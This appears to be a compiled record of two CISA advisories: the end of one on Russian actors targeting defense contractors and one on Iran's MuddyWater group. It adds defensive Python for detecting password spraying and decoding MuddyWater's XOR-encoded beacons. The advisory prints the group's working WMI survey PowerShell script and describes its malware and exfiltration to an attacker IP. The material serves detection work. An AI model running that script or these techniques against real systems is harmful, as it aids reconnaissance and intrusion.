Privilege Escalation consists of techniques that adversaries use to gain higher-level permissions on a system or network. The adversary obtains and abuses credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion [[T1078](<https://attack.mitre.org/techniques/T1078>)].[[24](<https://attack.mitre.org/groups/G0007>)] Specifically in this case, credentials of cloud accounts [[T1078.004](<https://attack.mitre.org/techniques/T1078/004>)] were obtained and abused.[[25](<https://attack.mitre.org/software/S0154/>)]

ID | Name | Description
---|---|---
T1078 | Valid Accounts | Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access.
T1078.004 | Valid Accounts: Cloud Accounts | Adversaries may obtain and abuse credentials of a cloud account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion.

#### **Defense Evasion** [[TA0005](<https://attack.mitre.org/tactics/TA0005>)]

Defense Evasion consists of techniques that adversaries use to avoid detection throughout their compromise. The adversary made its executables and files difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit [[T1027](<https://attack.mitre.org/techniques/T1027>)].[[26](<https://attack.mitre.org/software/S0410/>)]

ID | Name | Description
---|---|---
T1027 | Obfuscated Files or Information | Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit.

#### **Credential Access** [[TA0006](<https://attack.mitre.org/tactics/TA0006>)]

Credential Access consists of techniques for stealing credentials like account names and passwords.
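
Before the actor-specific detail, an added defensive example that is not code from the advisory or from CISA: how password spraying (the T1110.003 technique this section attributes to the actor) looks in authentication logs and how to pick it out. The rule below slides a time window over each source's failed logons and flags a source whose failures touch many distinct accounts with only one or two attempts each, then reports any account that subsequently signed in from the same source. The log format, the IP addresses, the account names and the thresholds are all constructed for the demonstration.

```python
"""Password-spraying detection (ATT&CK T1110.003) over authentication logs.

Added example for this page, not code from the advisory or its authors. The
log format and every event below are constructed for the demonstration.
"""
from collections import Counter, defaultdict
from dataclasses import dataclass
from datetime import datetime, timedelta

# Constructed sample, one event per line: "<UTC time> <source IP> <account> <FAIL|SUCCESS>".
# 203.0.113.7 tries one password against a dozen accounts, then signs in as one of them;
# 198.51.100.2 is a user mistyping a password; 192.0.2.9 hammers a single account
# (brute force, T1110.001, a different shape that this rule deliberately does not match).
SAMPLE_LOG = """\
2021-03-04T02:00:01Z 203.0.113.7 alice@example.org FAIL
2021-03-04T02:00:03Z 203.0.113.7 bob@example.org FAIL
2021-03-04T02:00:05Z 203.0.113.7 carol@example.org FAIL
2021-03-04T02:00:07Z 203.0.113.7 dan@example.org FAIL
2021-03-04T02:00:09Z 203.0.113.7 erin@example.org FAIL
2021-03-04T02:00:11Z 203.0.113.7 frank@example.org FAIL
2021-03-04T02:00:13Z 203.0.113.7 grace@example.org FAIL
2021-03-04T02:00:15Z 203.0.113.7 heidi@example.org FAIL
2021-03-04T02:00:17Z 203.0.113.7 ivan@example.org FAIL
2021-03-04T02:00:19Z 203.0.113.7 judy@example.org FAIL
2021-03-04T02:00:21Z 203.0.113.7 mallory@example.org FAIL
2021-03-04T02:00:23Z 203.0.113.7 oscar@example.org FAIL
2021-03-04T02:10:30Z 203.0.113.7 carol@example.org SUCCESS
2021-03-04T02:02:00Z 198.51.100.2 dave@example.org FAIL
2021-03-04T02:02:10Z 198.51.100.2 dave@example.org FAIL
2021-03-04T02:02:20Z 198.51.100.2 dave@example.org SUCCESS
2021-03-04T02:03:00Z 192.0.2.9 erin@example.org FAIL
2021-03-04T02:03:01Z 192.0.2.9 erin@example.org FAIL
2021-03-04T02:03:02Z 192.0.2.9 erin@example.org FAIL
2021-03-04T02:03:03Z 192.0.2.9 erin@example.org FAIL
"""


@dataclass(frozen=True)
class AuthEvent:
    ts: datetime
    src: str
    user: str
    success: bool


def parse_log(text):
    """Parse the constructed format; adapt this one function for real sign-in logs."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, src, user, result = line.split()
        events.append(AuthEvent(datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"),
                                src, user, result == "SUCCESS"))
    return events


def detect_spray(events, window=timedelta(minutes=60), min_users=8, max_per_user=2):
    """Flag a source when, within any `window`, its failures touch at least
    `min_users` distinct accounts with no more than `max_per_user` attempts each
    (the low-and-slow spray shape), and report any account that then succeeded
    from the same source, which is the sign that the spray found a password."""
    by_src = defaultdict(list)
    for e in events:
        by_src[e.src].append(e)
    findings = []
    for src, evs in by_src.items():
        evs.sort(key=lambda e: e.ts)
        fails = [e for e in evs if not e.success]
        counts = Counter()  # attempts per account inside the sliding window
        start, hit = 0, None
        for end, e in enumerate(fails):
            counts[e.user] += 1
            while e.ts - fails[start].ts > window:  # slide the window forward
                old = fails[start].user
                counts[old] -= 1
                if counts[old] == 0:
                    del counts[old]
                start += 1
            if len(counts) >= min_users and max(counts.values()) <= max_per_user:
                hit = (fails[start].ts, e.ts, len(counts))  # keep the latest, widest match
        if hit is None:
            continue
        first_fail = fails[0].ts
        compromised = sorted({e.user for e in evs if e.success and e.ts >= first_fail})
        findings.append({"src": src, "window_start": hit[0], "window_end": hit[1],
                         "distinct_users": hit[2],
                         "accounts_logged_in_after_spray": compromised})
    return findings


if __name__ == "__main__":
    for finding in detect_spray(parse_log(SAMPLE_LOG)):
        print(finding)
```

Thresholds are a starting point, not a standard: tune `min_users` and `window` to the tenant's normal failure rate, and treat a non-empty `accounts_logged_in_after_spray` list as the priority alert. Because this advisory notes that the actor routes traffic through TOR and VPN multi-hop proxies, a spray spread across many exit addresses will not cluster on one source IP; in that case group on the user-agent string, the ASN, or simply on the tenant-wide count of distinct accounts failing in the window.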
The adversary attempted to access or create a copy of the Active Directory (AD) domain database to steal credential information, as well as obtain other information about domain members such as devices, users, and access rights [[T1003.003](<https://attack.mitre.org/techniques/T1003/003>)].[[27](<https://attack.mitre.org/software/S0250/>)] The adversary also used a single or small list of commonly used passwords against many different accounts to attempt to acquire valid account credentials [[T1110.003](<https://attack.mitre.org/techniques/T1110/003>)].[[28](<https://attack.mitre.org/groups/G0007>)]

ID | Name | Description
---|---|---
T1003.003 | OS Credential Dumping: NTDS | Adversaries may attempt to access or create a copy of the Active Directory domain database to steal credential information, as well as obtain other information about domain members such as devices, users, and access rights.
T1110.003 | Brute Force: Password Spraying | Adversaries may use a single or small list of commonly used passwords against many different accounts to attempt to acquire valid account credentials.

#### **Discovery** [[TA0007](<https://attack.mitre.org/tactics/TA0007>)]

Discovery consists of techniques an adversary may use to gain knowledge about the system and internal network.
The adversary enumerated files and directories or searched in specific locations of a host or network share for certain information within a file system [[T1083](<https://attack.mitre.org/techniques/T1083>)].[29] In addition, the adversary attempted to gather information on domain trust relationships that may be used to identify lateral movement opportunities in Windows multi-domain or forest environments [[T1482](<https://attack.mitre.org/techniques/T1482>)].[30]

ID | Name | Description
---|---|---
T1083 | File and Directory Discovery | Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system.
T1482 | Domain Trust Discovery | Adversaries may attempt to gather information on domain trust relationships that may be used to identify lateral movement opportunities in Windows multi-domain/forest environments.

#### **Collection** [[TA0009](<https://attack.mitre.org/tactics/TA0009>)]

Collection consists of both the techniques adversaries may use to gather information and the sources that information is collected from that are relevant to the adversary's objectives. The adversary leverages information repositories, such as SharePoint, to mine valuable information [[T1213.002](<https://attack.mitre.org/techniques/T1213/002>)].[[31](<https://attack.mitre.org/groups/G0007>)]

ID | Name | Description
---|---|---
T1213.002 | Data from Information Repositories: SharePoint | Adversaries may leverage the SharePoint repository as a source to mine valuable information.

#### **Command and Control** [[TA0011](<https://attack.mitre.org/tactics/TA0011>)]

Command and Control (C2) consists of techniques that adversaries may use to communicate with systems under their control within a victim network. The adversary chained together multiple proxies to disguise the source of malicious traffic.
In this case, TOR and VPN servers are used as multi-hop proxies to route C2 traffic and obfuscate their activities [[T1090.003](<https://attack.mitre.org/techniques/T1090/003>)].[[32](<https://attack.mitre.org/groups/G0007>)]

ID | Name | Description
---|---|---
T1090.003 | Proxy: Multi-hop Proxy | To disguise the source of malicious traffic, adversaries may chain together multiple proxies.

### Additional Resources

[1] NSA, CISA, FBI, NCSC Cybersecurity Advisory: [Russian GRU Conducting Global Brute Force Campaign to Compromise Enterprise and Cloud Environments](<https://media.defense.gov/2021/Jul/01/2002753896/-1/-1/1/CSA_GRU_GLOBAL_BRUTE_FORCE_CAMPAIGN_UOO158036-21.PDF>), 1 July 2021.
[2] NSA Cybersecurity Advisory: [Mitigating Recent VPN Vulnerabilities](<https://media.defense.gov/2019/Oct/07/2002191601/-1/-1/0/CSA-MITIGATING-RECENT-VPN-VULNERABILITIES.PDF>), 7 October 2019.
[3] NSA, CISA, FBI, NCSC Cybersecurity Advisory: [Russian GRU Conducting Global Brute Force Campaign to Compromise Enterprise and Cloud Environments](<https://media.defense.gov/2021/Jul/01/2002753896/-1/-1/1/CSA_GRU_GLOBAL_BRUTE_FORCE_CAMPAIGN_UOO158036-21.PDF>), 1 July 2021.
[4] Microsoft Article: [AD Forest Recovery – Resetting the krbtgt password](<https://docs.microsoft.com/en-us/windows-server/identity/ad-ds/manage/ad-forest-recovery-resetting-the-krbtgt-password>), 29 July 2021.
[5] Microsoft GitHub: [New-KrbtgtKeys.ps1](<https://github.com/microsoft/New-KrbtgtKeys.ps1>), 14 May 2020.
[6] NSA Cybersecurity Information: [Defend Privileges and Accounts](<https://media.defense.gov/2019/Sep/09/2002180330/-1/-1/0/Defend Privileges and Accounts - Copy.pdf>), August 2019.
[7] Microsoft Article: [Group Managed Service Accounts Overview](<https://docs.microsoft.com/en-us/windows-server/security/group-managed-service-accounts/group-managed-service-accounts-overview>), 29 July 2021.
[8] NSA Cybersecurity Information: [Leverage Modern Hardware Security Features](<https://media.defense.gov/2019/Sep/09/2002180345/-1/-1/0/Leverage Modern Hardware Security Features - Copy.pdf>), August 2019.
[9] Microsoft Article: [Protect derived domain credentials with Windows Defender Credential Guard](<https://docs.microsoft.com/en-us/windows/security/identity-protection/credential-guard/credential-guard>), 3 December 2021.
[10] Microsoft Article: [Windows Defender Credential Guard protection limits](<https://docs.microsoft.com/en-us/windows/security/identity-protection/credential-guard/credential-guard-protection-limits>), 3 December 2021.
[11] Microsoft Article: [Windows 11 requirements](<https://docs.microsoft.com/en-us/windows/whats-new/windows-11-requirements>), 30 November 2021.
[12] Microsoft Blog Post: [The Importance of KB2871997 and KB2928120 for Credential Protection](<https://techcommunity.microsoft.com/t5/core-infrastructure-and-security/the-importnace-of-kb2871997-and-kb2928120-for-credential/ba-p/258478>), 20 September 2021.
[13] Microsoft Article: [What’s New in Credential Protection](<https://docs.microsoft.com/en-us/windows-server/security/credentials-protection-and-management/whats-new-in-credential-protection>), 7 January 2022.
[14] NSA Cybersecurity Factsheet: [PowerShell: Security Risks and Defenses](<https://www.iad.gov/iad/library/ia-guidance/security-tips/powershell-security-risks-and-defenses.cfm>), 1 December 2016.
[15] NSA Cybersecurity Information: [Update and Upgrade Software Immediately](<https://media.defense.gov/2019/Sep/09/2002180319/-1/-1/0/Update and Upgrade Software Immediately.docx - Copy.pdf>), August 2019.
[16] NSA Cybersecurity Information: [Actively Manage Systems and Configurations](<https://media.defense.gov/2019/Sep/09/2002180326/-1/-1/0/Actively Manage Systems and Configurations.docx - Copy.pdf>), August 2019.
[17] MITRE Groups: [APT28](<https://attack.mitre.org/groups/G0007>), 18 October 2021.
[18] MITRE Groups: [APT28](<https://attack.mitre.org/groups/G0007>), 18 October 2021.
[19] MITRE Software: [Cobalt Strike](<https://attack.mitre.org/software/S0154/>), 18 October 2021.
[20] Based on technical information shared by Mandiant.
[21] MITRE Groups: [APT28](<https://attack.mitre.org/groups/G0007>), 18 October 2021.
[22] Based on technical information shared by Mandiant.
[23] MITRE Groups: [APT28](<https://attack.mitre.org/groups/G0007>), 18 October 2021.
[24] MITRE Groups: [APT28](<https://attack.mitre.org/groups/G0007>), 18 October 2021.
[25] MITRE Software: [Cobalt Strike](<https://attack.mitre.org/software/S0154/>), 18 October 2021.
[26] MITRE Software: [Fysbis](<https://attack.mitre.org/software/S0410/>), 6 November 2020.
[27] MITRE Software: [Koadic](<https://attack.mitre.org/software/S0250/>), 30 March 2020.
[28] MITRE Groups: [APT28](<https://attack.mitre.org/groups/G0007>), 18 October 2021.
[29] Based on technical information shared by Mandiant.
[30] Based on technical information shared by Mandiant.
[31] MITRE Groups: [APT28](<https://attack.mitre.org/groups/G0007>), 18 October 2021.
[32] MITRE Groups: [APT28](<https://attack.mitre.org/groups/G0007>), 18 October 2021.

### Revisions

February 16, 2022: Initial Version

Advisory record metadata (index fields attached to this entry):

 * CVSS v3.1: base score 9.8, CRITICAL (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H); exploitability score 3.9, impact score 5.9
 * Published: 2022-02-16T12:00:00
 * Type: ics
 * Title: Russian State-Sponsored Cyber Actors Target Cleared Defense Contractor Networks to Obtain Sensitive U.S.
Defense Information and Technology
 * Bulletin family: info
 * CVSS v2: base score 9.0, HIGH (AV:N/AC:L/Au:S/C:C/I:C/A:C); exploitability score 8.0, impact score 10.0; obtainAllPrivilege, obtainUserPrivilege, obtainOtherPrivilege, userInteractionRequired and acInsufInfo all false
 * CVE list: CVE-2018-13379, CVE-2020-0688, CVE-2020-17144
 * Modified: 2022-02-16T12:00:00
 * ID: AA22-047A
 * Link: https://www.cisa.gov/news-events/cybersecurity-advisories/aa22-047a
 * CVSS summary: score 9.0, vector AV:N/AC:L/Au:S/C:C/I:C/A:C

Next advisory record (index entry last seen 2023-03-14T18:28:18):

### Summary

**Actions to Take Today to Protect Against Malicious Activity**
* Search for indicators of compromise.
* Use antivirus software.
* [Patch](<https://us-cert.cisa.gov/ncas/tips/ST04-006>) all systems.
* Prioritize patching [known exploited vulnerabilities](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>).
* Train users to recognize and report [phishing attempts](<https://us-cert.cisa.gov/ncas/tips/ST04-014>).
* Use [multi-factor authentication](<https://us-cert.cisa.gov/ncas/tips/ST05-012>).

_**Note:** this advisory uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK®) framework, version 10. See the [ATT&CK for Enterprise](<https://attack.mitre.org/versions/v10/techniques/enterprise/>) for all referenced threat actor tactics and techniques._

The Federal Bureau of Investigation (FBI), the Cybersecurity and Infrastructure Security Agency (CISA), the U.S.
Cyber Command Cyber National Mission Force (CNMF), and the United Kingdom’s National Cyber Security Centre (NCSC-UK) have observed a group of Iranian government-sponsored advanced persistent threat (APT) actors, known as MuddyWater, conducting cyber espionage and other malicious cyber operations targeting a range of government and private-sector organizations across sectors—including telecommunications, defense, local government, and oil and natural gas—in Asia, Africa, Europe, and North America. **Note:** MuddyWater is also known as Earth Vetala, MERCURY, Static Kitten, Seedworm, and TEMP.Zagros.

MuddyWater is a subordinate element within the Iranian Ministry of Intelligence and Security (MOIS).[[1](<https://www.cybercom.mil/Media/News/Article/2897570/iranian-intel-cyber-suite-of-malware-uses-open-source-tools/>)] This APT group has conducted broad cyber campaigns in support of MOIS objectives since approximately 2018. MuddyWater actors are positioned both to provide stolen data and accesses to the Iranian government and to share these with other malicious cyber actors.

MuddyWater actors are known to exploit publicly reported vulnerabilities and use open-source tools and strategies to gain access to sensitive data on victims’ systems and deploy ransomware. These actors also maintain persistence on victim networks via tactics such as side-loading dynamic link libraries (DLLs)—to trick legitimate programs into running malware—and obfuscating PowerShell scripts to hide command and control (C2) functions. FBI, CISA, CNMF, and NCSC-UK have observed MuddyWater actors recently using various malware—variants of PowGoop, Small Sieve, Canopy (also known as Starwhale), Mori, and POWERSTATS—along with other tools as part of their malicious activity.

This advisory provides observed tactics, techniques, and procedures (TTPs); malware; and indicators of compromise (IOCs) associated with this Iranian government-sponsored APT activity to aid organizations in the identification of malicious activity against sensitive networks.

FBI, CISA, CNMF, NCSC-UK, and the National Security Agency (NSA) recommend organizations apply the mitigations in this advisory and review the following resources for additional information. **Note:** also see the Additional Resources section.

 * Malware Analysis Report – [MAR-10369127-1.v1: MuddyWater](<https://www.cisa.gov/uscert/ncas/analysis-reports/ar22-055a>)
 * IOCs – AA22-052A.stix and MAR-10369127-1.v1.stix
 * CISA's webpage – [Iran Cyber Threat Overview and Advisories](<https://www.cisa.gov/uscert/iran>)
 * [NCSC-UK MAR – Small Sieve](<https://www.ncsc.gov.uk/files/NCSC-Malware-Analysis-Report-Small-Sieve.pdf>)
 * [CNMF's press release – Iranian intel cyber suite of malware uses open source tools](<https://www.cybercom.mil/Media/News/Article/2897570/iranian-intel-cyber-suite-of-malware-uses-open-source-tools/>)

### Technical Details

FBI, CISA, CNMF, and NCSC-UK have observed the Iranian government-sponsored MuddyWater APT group employing spearphishing, exploiting publicly known vulnerabilities, and leveraging multiple open-source tools to gain access to sensitive government and commercial networks.

As part of its spearphishing campaign, MuddyWater attempts to coax their targeted victim into downloading ZIP files, containing either an Excel file with a malicious macro that communicates with the actor’s C2 server or a PDF file that drops a malicious file to the victim’s network [[T1566.001](<https://attack.mitre.org/versions/v10/techniques/T1566/001/>), [T1204.002](<https://attack.mitre.org/versions/v10/techniques/T1204/002>)].
MuddyWater actors also use techniques such as side-loading DLLs [[T1574.002](<https://attack.mitre.org/versions/v10/techniques/T1574/002/>)] to trick legitimate programs into running malware and obfuscating PowerShell scripts [[T1059.001](<https://attack.mitre.org/versions/v10/techniques/T1059/001/>)] to hide C2 functions [[T1027](<https://attack.mitre.org/versions/v10/techniques/T1027/>)] (see the PowGoop section for more information).

Additionally, the group uses multiple malware sets—including PowGoop, Small Sieve, Canopy/Starwhale, Mori, and POWERSTATS—for loading malware, backdoor access, persistence [[TA0003](<https://attack.mitre.org/versions/v10/tactics/TA0003/>)], and exfiltration [[TA0010](<https://attack.mitre.org/versions/v10/tactics/TA0010/>)]. See below for descriptions of some of these malware sets, including newer tools or variants to the group’s suite. Additionally, see Malware Analysis Report [MAR-10369127.r1.v1: MuddyWater](<https://www.cisa.gov/uscert/ncas/analysis-reports/ar22-055a>) for further details.

#### **PowGoop**

MuddyWater actors use new variants of PowGoop malware as their main loader in malicious operations; it consists of a DLL loader and a PowerShell-based downloader. The malicious file impersonates a legitimate file that is signed as a Google Update executable file.

According to samples of PowGoop analyzed by [CISA](<https://www.cisa.gov/uscert/ncas/analysis-reports/ar22-055a>) and [CNMF](<https://www.cybercom.mil/Media/News/Article/2897570/iranian-intel-cyber-suite-of-malware-uses-open-source-tools/>), PowGoop consists of three components:

 * A DLL file renamed as a legitimate filename, `Goopdate.dll`, to enable the DLL side-loading technique [[T1574.002](<https://attack.mitre.org/versions/v10/techniques/T1574/002/>)]. The DLL file is contained within an executable, `GoogleUpdate.exe`.
 * A PowerShell script, obfuscated as a .dat file, `goopdate.dat`, used to decrypt and run a second obfuscated PowerShell script, `config.txt` [[T1059.001](<https://attack.mitre.org/versions/v10/techniques/T1059/001/>)].
 * `config.txt`, an encoded, obfuscated PowerShell script containing a beacon to a hardcoded IP address.

These components retrieve encrypted commands from a C2 server. The DLL file hides communications with MuddyWater C2 servers by executing with the Google Update service.

#### **Small Sieve**

According to a sample [analyzed by NCSC-UK](<https://www.ncsc.gov.uk/files/NCSC-Malware-Analysis-Report-Small-Sieve.pdf>), Small Sieve is a simple Python [[T1059.006](<https://attack.mitre.org/versions/v10/techniques/T1059/006/>)] backdoor distributed using a Nullsoft Scriptable Install System (NSIS) installer, `gram_app.exe`. The NSIS installer installs the Python backdoor, `index.exe`, and adds it as a registry run key [[T1547.001](<https://attack.mitre.org/versions/v10/techniques/T1547/001/>)], enabling persistence [[TA0003](<https://attack.mitre.org/versions/v10/tactics/TA0003/>)].

MuddyWater disguises malicious executables and uses filenames and Registry key names associated with Microsoft's Windows Defender to avoid detection during casual inspection. The APT group has also used variations of Microsoft (e.g., "Microsift") and Outlook in its filenames associated with Small Sieve [[T1036.005](<https://attack.mitre.org/versions/v10/techniques/T1036/005/>)].

Small Sieve provides basic functionality required to maintain and expand a foothold in victim infrastructure and avoid detection [[TA0005](<https://attack.mitre.org/versions/v10/tactics/TA0005/>)] by using custom string and traffic obfuscation schemes together with the Telegram Bot application programming interface (API).
Specifically, Small Sieve’s beacons and taskings are performed using the Telegram API over Hypertext Transfer Protocol Secure (HTTPS) [[T1071.001](<https://attack.mitre.org/versions/v10/techniques/T1071/001>)], and the tasking and beaconing data is obfuscated through a hex byte swapping encoding scheme combined with an obfuscated Base64 function [[T1027](<https://attack.mitre.org/versions/v10/techniques/T1027>), [T1132.002](<https://attack.mitre.org/versions/v10/techniques/T1132/002/>)].

**Note:** cybersecurity agencies in the United Kingdom and the United States attribute Small Sieve to MuddyWater with high confidence.

See Appendix B for further analysis of Small Sieve malware.

#### **Canopy**

MuddyWater also uses Canopy/Starwhale malware, likely distributed via spearphishing emails with targeted attachments [[T1566.001](<https://attack.mitre.org/versions/v10/techniques/T1566/001>)]. According to two Canopy/Starwhale samples analyzed by CISA, Canopy uses Windows Script File (.wsf) scripts distributed by a malicious Excel file. **Note:** the cybersecurity agencies of the United Kingdom and the United States attribute these malware samples to MuddyWater with high confidence.

In the samples CISA analyzed, a malicious Excel file, `Cooperation terms.xls`, contained macros written in Visual Basic for Applications (VBA) and two encoded Windows Script Files. When the victim opens the Excel file, they receive a prompt to enable macros [[T1204.002](<https://attack.mitre.org/versions/v10/techniques/T1204/002/>)]. Once this occurs, the macros are executed, decoding and installing the two embedded Windows Script Files.

The first .wsf is installed in the current user startup folder [[T1547.001](<https://attack.mitre.org/versions/v10/techniques/T1547/001/>)] for persistence. The file contains hexadecimal (hex)-encoded strings that have been reshuffled [[T1027](<https://attack.mitre.org/versions/v10/techniques/T1027/>)].
The file executes a command to run the second .wsf.

The second .wsf also contains hex-encoded strings that have been reshuffled. This file collects [[TA0035](<https://attack.mitre.org/versions/v10/tactics/TA0035/>)] the victim system’s IP address, computer name, and username [[T1005](<https://attack.mitre.org/versions/v10/techniques/T1005/>)]. The collected data is then hex-encoded and sent to an adversary-controlled IP address, `http[:]88.119.170[.]124`, via an HTTP POST request [[T1041](<https://attack.mitre.org/versions/v10/techniques/T1041/>)].

#### **Mori**

MuddyWater also uses the Mori backdoor, which uses Domain Name System (DNS) tunneling to communicate with the group’s C2 infrastructure [[T1572](<https://attack.mitre.org/versions/v10/techniques/T1572/>)].

According to one sample analyzed by CISA, `FML.dll`, Mori uses a DLL written in C++ that is executed with `regsvr32.exe` with export `DllRegisterServer`; this DLL appears to be a component of another program. `FML.dll` contains approximately 200MB of junk data [[T1001.001](<https://attack.mitre.org/versions/v10/techniques/T1001/001/>)] in a resource directory 205, number 105. Upon execution, `FML.dll` creates a mutex, `0x50504060`, and performs the following tasks:

 * Deletes the file `FILENAME.old` and deletes file by registry value. The filename is the DLL file with a `.old` extension.
 * Resolves networking APIs from strings that are ADD-encrypted with the key `0x05`.
 * Uses Base64 and JavaScript Object Notation (JSON) based on certain key values passed to the JSON library functions.
It appears likely that JSON is used to serialize C2 commands and/or their results.
 * Communicates using HTTP over either IPv4 or IPv6, depending on the value of an unidentified flag, for C2 [[T1071.001](<https://attack.mitre.org/versions/v10/techniques/T1071/001/>)].
 * Reads and/or writes data from the following Registry Keys, `HKLM\Software\NFC\IPA` and `HKLM\Software\NFC\(Default)`.

#### **POWERSTATS**

This group is also known to use the POWERSTATS backdoor, which runs PowerShell scripts to maintain persistent access to the victim systems [[T1059.001](<https://attack.mitre.org/versions/v10/techniques/T1059>)].

CNMF has posted samples further detailing the different parts of MuddyWater’s new suite of tools—along with JavaScript files used to establish connections back to malicious infrastructure—to the malware aggregation tool and repository, [VirusTotal](<http://www.virustotal.com/en/user/CYBERCOM_Malware_Alert>). Network operators who identify multiple instances of the tools on the same network should investigate further as this may indicate the presence of an Iranian malicious cyber actor.

MuddyWater actors are also known to exploit unpatched vulnerabilities as part of their targeted operations. FBI, CISA, CNMF, and NCSC-UK have observed this APT group recently exploiting the Microsoft Netlogon elevation of privilege vulnerability ([CVE-2020-1472](<https://vulners.com/cve/CVE-2020-1472>)) and the Microsoft Exchange memory corruption vulnerability ([CVE-2020-0688](<https://vulners.com/cve/CVE-2020-0688>)).
See [CISA’s Known Exploited Vulnerabilities Catalog](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>) for additional vulnerabilities with known exploits and the joint Cybersecurity Advisory [Iranian Government-Sponsored APT Cyber Actors Exploiting Microsoft Exchange and Fortinet Vulnerabilities](<https://www.cisa.gov/uscert/ncas/alerts/aa21-321a>) for additional Iranian APT group-specific vulnerability exploits.

#### **Survey Script**

The following script is an example of a survey script used by MuddyWater to enumerate information about victim computers. It queries the Windows Management Instrumentation (WMI) service to obtain information about the compromised machine to generate a string, with these fields separated by a delimiter (e.g., `;;` in this sample). The produced string is usually encoded by the MuddyWater implant and sent to an adversary-controlled IP address.

```powershell
$O = Get-WmiObject Win32_OperatingSystem;$S = $O.Name;$S += ";;";$ips = "";Get-WmiObject Win32_NetworkAdapterConfiguration -Filter "IPEnabled=True" | % {$ips = $ips + ", " + $_.IPAddress[0]};$S += $ips.substring(1);$S += ";;";$S += $O.OSArchitecture;$S += ";;";$S += [System.Net.DNS]::GetHostByName('').HostName;$S += ";;";$S += ((Get-WmiObject Win32_ComputerSystem).Domain);$S += ";;";$S += $env:UserName;$S += ";;";$AntiVirusProducts = Get-WmiObject -Namespace "root\SecurityCenter2" -Class AntiVirusProduct -ComputerName $env:computername;$resAnti = @();foreach($AntiVirusProduct in $AntiVirusProducts){$resAnti += $AntiVirusProduct.displayName};$S += $resAnti;echo $S;
```

#### **Newly Identified PowerShell Backdoor**

The newly identified PowerShell backdoor used by MuddyWater below uses a single-byte Exclusive-OR (XOR) to encrypt communications with the key 0x02 to adversary-controlled infrastructure.
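
As an added example for the survey script above and for the backdoor encoding just described (not code from the advisory or its authors): two Python helpers an analyst can run during triage. The first scores a PowerShell script-block text (the kind logged as event 4104) against the combination of WMI classes and the `;;` delimiter that characterises the survey script, so that an ordinary one-class WMI query does not alert but the survey shape does. The second reverses the backdoor's Base64-over-XOR encoding on a captured cookie value or response body, and narrows the key when a variant changes it. The key 0x02 and the `;;` delimiter come from the advisory; the indicator list, the constructed script-block samples, the sample survey result, the "captured" cookie value and all function names are assumptions of this example.

```python
"""Triage helpers for the two MuddyWater PowerShell artifacts described in
this advisory: the WMI survey script and the XOR-0x02/Base64 C2 encoding.

Added example for this page, not code from the advisory or its authors.
The script blocks and the "captured" cookie value below are constructed for
the demonstration; the key 0x02 and the ";;" delimiter come from the advisory.
"""
import base64
import re

# Indicators the survey script combines. Each alone is ordinary admin activity;
# most of them together in one script block plus the ";;" field delimiter is
# the survey's shape. (Assumed list, derived from the script quoted above.)
SURVEY_INDICATORS = (
    r"Win32_OperatingSystem",
    r"Win32_NetworkAdapterConfiguration",
    r"Win32_ComputerSystem",
    r"root\\SecurityCenter2",
    r"AntiVirusProduct",
    r"GetHostByName",
    r"\$env:UserName",
    r";;",
)

# Constructed script-block texts standing in for logged 4104 events.
SUSPICIOUS_BLOCK = (
    '$O = Get-WmiObject Win32_OperatingSystem;$S = $O.Name;$S += ";;";'
    'Get-WmiObject Win32_NetworkAdapterConfiguration -Filter "IPEnabled=True";'
    "$S += [System.Net.DNS]::GetHostByName('').HostName;$S += \";;\";"
    '$S += (Get-WmiObject Win32_ComputerSystem).Domain;$S += ";;";$S += $env:UserName;'
    'Get-WmiObject -Namespace "root\\SecurityCenter2" -Class AntiVirusProduct'
)
BENIGN_BLOCK = "Get-WmiObject Win32_OperatingSystem | Select-Object Caption, Version"


def score_survey_script(script_text, min_hits=5):
    """Return which survey indicators a script block contains and whether the
    combination crosses the alerting threshold."""
    hits = [p for p in SURVEY_INDICATORS if re.search(p, script_text, re.IGNORECASE)]
    return {"suspicious": len(hits) >= min_hits, "hits": hits}


def decode_c2(b64_text, key=0x02):
    """Reverse the backdoor's Base64(bytes XOR key) encoding on a captured
    cookie header or response body. Undecodable bytes become U+FFFD instead
    of raising, so a truncated capture still yields readable text."""
    raw = base64.b64decode(b64_text)
    return bytes(b ^ key for b in raw).decode("utf-8", errors="replace")


def xor_key_candidates(b64_text):
    """Narrow a changed single-byte key: keep only keys under which every
    decoded byte is printable ASCII (or tab/CR/LF). Inspect the survivors."""
    raw = base64.b64decode(b64_text)

    def printable(data):
        return all(0x20 <= b < 0x7F or b in (0x09, 0x0A, 0x0D) for b in data)

    return [k for k in range(256) if printable(bytes(b ^ k for b in raw))]


def parse_survey_fields(text, delimiter=";;"):
    """Split a decoded survey result into its fields (OS, IPs, architecture,
    host name, domain, user name, antivirus products)."""
    return [f.strip() for f in text.split(delimiter)]


# Constructed survey result and the cookie value the backdoor would send for it.
SURVEY_RESULT = ("Microsoft Windows 10 Pro;;10.0.0.5;;64-bit;;WS01.example.test;;"
                 "example.test;;jdoe;;Windows Defender")
CAPTURED_COOKIE = base64.b64encode(bytes(b ^ 0x02 for b in SURVEY_RESULT.encode())).decode()


if __name__ == "__main__":
    for name, block in (("suspicious", SUSPICIOUS_BLOCK), ("benign", BENIGN_BLOCK)):
        print(name, score_survey_script(block))
    print("decoded:", decode_c2(CAPTURED_COOKIE))
    print("fields:", parse_survey_fields(decode_c2(CAPTURED_COOKIE)))
    print("plausible keys:", xor_key_candidates(CAPTURED_COOKIE))
```

Run `score_survey_script` over script-block text from PowerShell logging with Script Block Logging enabled, and `decode_c2` over the `cookie` header values and HTTP response bodies captured for the beacon URL in the advisory's IOCs; a decoded result that splits cleanly on `;;` into OS, address, architecture, host, domain and user fields is the survey output travelling back to the operator. `xor_key_candidates` only filters, it does not rank: with a printable plaintext it leaves a handful of low keys, which an analyst reads off by eye or by letter-frequency scoring.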
